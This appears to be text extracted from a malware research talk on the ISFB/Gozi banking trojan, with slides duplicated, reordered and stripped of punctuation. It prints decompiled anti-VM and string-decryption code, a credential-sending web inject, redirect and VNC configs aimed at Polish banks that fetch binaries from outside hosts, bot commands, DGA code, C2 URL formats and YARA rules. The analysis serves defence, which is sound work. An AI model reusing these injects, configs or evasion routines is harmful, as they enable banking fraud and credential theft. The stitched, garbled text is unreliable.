    /* 0xC is SPDRP_FRIENDLYNAME: the first call only sizes the buffer */
    SetupDiGetDeviceRegistryPropertyA(v1, &DeviceInfoData, 0xCu, &Property, 0, 0, &PropertyBufferSize);
    if ( PropertyBufferSize )
    {
        v2 = (BYTE *)xHeapAlloc(PropertyBufferSize);
        v3 = (CHAR *)v2;
        if ( v2 )
        {
            if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSet, &DeviceInfoData, 0xCu, &Property, v2, PropertyBufferSize, &PropertyBufferSize)
              && (StrStrIA(v3, (LPCSTR)"vbox") || StrStrIA(v3, "qemu") || StrStrIA(v3, "vmware") || StrStrIA(v3, "virtual hd")) )
                v0 = 1;     /* device friendly name gives the hypervisor away */
            xHeapFree(v3);
        }
    }
}

C


String encryption

signed int __stdcall decode_bss(int shift)
{
    /* v2 points to the section header of .bss */
    if ( !v2 )
        return 2;
    v6 = v2->VirtualAddress;
    if ( !v6 || !v2->SizeOfRawData )
        return 192;
    v7 = v2->SizeOfRawData;
    v8 = *(_DWORD *)"016";
    v9 = v13;
    /* key: five bits of the cursor-derived shift plus DWORDs of the build date string and the section geometry */
    v10 = (shift & 0x1F) + (*(_DWORD *)"29 2016" ^ *(_DWORD *)"Oct 29 2016" ^ (v7 + v6));
    XorDecryptBuffer(v7, (int)((char *)v13 + v6), v2->SizeOfRawData, v10);
    dword_4064EC = dword_40766E + dword_407662 + dword_407666;
    if ( dword_40766E + dword_407662 + dword_407666 != 0xEE553B4E )   /* check if correctly decoded */
    {
        /* wrong key: put the section back as it was and report 12 so the caller retries */
        XorEncryptBuffer(dword_407662, (IMAGE_DOS_HEADER *)((char *)v9 + v2->VirtualAddress), v2->SizeOfRawData);
        v14 = 12;
    }

C


Joined resources, or FJ-structs

typedef struct {
    DWORD fj_magic;
    DWORD addr;
    DWORD size;
    DWORD crc32_name;
    DWORD flags;        /* OR-ed with 0x10000 means it is packed with aPLib */
} isfb_fj_elem;

C
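A scanner for both joined-resource layouts, the FJ struct above and the J1 struct from the J1-structs slide, together with the crc32_name table from that slide. It is an added example, not code from the talk or from the ISFB project, and it makes two assumptions the slides do not state: that the magic DWORD holds the ASCII tag ("FJ" or "J1") in its low two bytes with the upper bytes zero, and that `addr` is an offset from the start of the image. It runs on a constructed image with placeholder bodies; no aPLib unpacking is attempted, the flag is only reported.

```python
import struct

# crc32_name -> resource name, from the J1-structs slide
RESOURCE_NAMES = {
    0x4F75CEA7: "CRC_CLIENT32", 0x9E154A0C: "CRC_CLIENT32",
    0xD722AFCB: "CRC_CLIENT_INI", 0x8365B957: "CRC_CLIENT_INI", 0x8FB1DDE1: "CRC_CLIENT_INI",
    0xE1285E64: "CRC_PUBLIC_KEY",
    0x90F8AAB4: "CRC_CLIENT64", 0x41982E1F: "CRC_CLIENT64",
    0x7A042A8A: "NEW / UNKNOWN",
}
APLIB_FLAG = 0x10000   # FJ-structs slide: flags | 0x10000 means the body is aPLib packed

HDR = struct.Struct("<IIIII")   # five little-endian DWORDs in both layouts
# ASSUMPTION: the magic DWORD is the ASCII tag in its low two bytes, upper bytes zero
FJ_MAGIC = int.from_bytes(b"FJ\x00\x00", "little")
J1_MAGIC = int.from_bytes(b"J1\x00\x00", "little")


def decode_header(image, off):
    """Decode one FJ or J1 header at `off`; None if no valid header starts there."""
    fields = HDR.unpack_from(image, off)
    if fields[0] == FJ_MAGIC:
        _, addr, size, crc, flags = fields      # FJ: magic, addr, size, crc32_name, flags
        kind = "FJ"
    elif fields[0] == J1_MAGIC:
        _, flags, crc, addr, size = fields      # J1: magic, flags, crc32_name, addr, size
        kind = "J1"
    else:
        return None
    # ASSUMPTION: addr is an offset from the image start; reject bodies that fall outside it
    if size == 0 or addr + size > len(image):
        return None
    return {"kind": kind, "hdr_off": off, "addr": addr, "size": size,
            "name": RESOURCE_NAMES.get(crc, "unknown_%08x" % crc),
            "packed": bool(flags & APLIB_FLAG)}


def scan_joined_resources(image):
    """Byte-wise scan for headers; returns them in file order."""
    found = []
    off = 0
    while off + HDR.size <= len(image):
        hdr = decode_header(image, off)
        if hdr is None:
            off += 1
        else:
            found.append(hdr)
            off += HDR.size
    return found


def resource_body(image, hdr):
    """Raw bytes of the resource a header describes (still packed if the flag is set)."""
    return bytes(image[hdr["addr"]:hdr["addr"] + hdr["size"]])


def build_sample_image():
    """Constructed image: one FJ entry, one J1 entry, and one bogus header pointing outside."""
    image = bytearray(0x200)
    body32 = b"MZ" + b"\x90" * 30                 # stand-in for a CLIENT32 body
    body_ini = b"constructed-cfg"                 # stand-in for CLIENT_INI data
    image[0x100:0x100 + len(body32)] = body32
    image[0x180:0x180 + len(body_ini)] = body_ini
    HDR.pack_into(image, 0x40, FJ_MAGIC, 0x100, len(body32), 0x9E154A0C, 0)
    HDR.pack_into(image, 0x60, J1_MAGIC, APLIB_FLAG, 0x8365B957, 0x180, len(body_ini))
    HDR.pack_into(image, 0x80, J1_MAGIC, 0, 0xE1285E64, 0x1000, 0x40)   # body outside the image
    return image


if __name__ == "__main__":
    img = build_sample_image()
    for hdr in scan_joined_resources(img):
        print("%s @0x%04x %-16s addr=0x%04x size=%-4d packed=%s" % (
            hdr["kind"], hdr["hdr_off"], hdr["name"], hdr["addr"], hdr["size"], hdr["packed"]))
```

The out-of-range check is what keeps a scan over an unpacked dump from reporting every stray "J1" in a string table as a resource; on a real dump, the bodies flagged as packed still need aPLib decompression before the CRC names mean anything.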

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 12: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common Roots

    · Bolek/KBOT - based on Gozi
    · Rovnix - ISFB was the ring3 payload protected by Rovnix
    · Vawtrak - nothing in common

Payloads

    · Nymaim
    · Powersniff / PunchyBagg


Recap


Recap

    · One of the oldest bankers under active development
    · Interesting solutions
    · Various methods of infection
    · Elaborate communication methods: DGA, P2P, TOR
    · Old bugs die hard
    · Read the paper for more details
    · Code soon available at github: mak/random-stuff/isfb


Kudos

People that knowingly (or not) helped us:

    · Slavo
    · Paul Black
    · Kafeine
    · Peter Kruse
    · Piotr Kijewski
    · Jarosław Jedynak
    · Horgh
    · Frank Ruiz


Q & A

    info@cert.pl    www.cert.pl
    CERTPolska    CERTPolska_en
    mak    mak@cert.pl


Useless strings


One Rule to rule them all

    rule isfb_dropper : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "Tape Device" fullword
            $str1 = "ASCIT8" fullword
            $str2 = "IEEE 1394"
            $str3 = ".bss"
